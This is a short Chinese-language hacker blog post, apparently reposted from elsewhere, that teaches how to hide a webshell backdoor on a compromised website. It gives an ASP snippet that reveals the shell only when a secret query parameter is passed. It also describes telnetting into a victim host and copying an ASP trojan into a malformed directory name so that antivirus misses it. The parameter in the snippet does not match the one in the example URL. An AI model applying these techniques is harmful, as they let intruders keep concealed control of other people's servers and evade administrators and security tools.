蓝盟诗人[LUC]蓝客联盟

更简单的留下你的webshell后门

2011-08-07 19:21 作者: 来源: 本站 浏览: 2,662 views 我要评论 字号:

得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!
所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的,

1.下面教一种很菜的方法,ASP插入法,不容易被发现~
在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="ok" then %>
***********************
<% end if %>

在***********处加入你的shell代码
就可以了
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell)
就可以调出webshell了,不影响正常浏揽
2.还有一种方法
前提是得到系统权限之后,
telnet  肉肉IP Port
成功telnet之后,传一个asp木马
进入网站目录
最后是在下一层吧
md s...\
copy 1.asp s.../
OK,这样防毒软件就搞不到了
防问时 [url]http://your[/url] 肉肉/s.../1.asp
诗人博客转载自网络

打印
分享到:
复制链接

发表评论

*

* (保密)

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.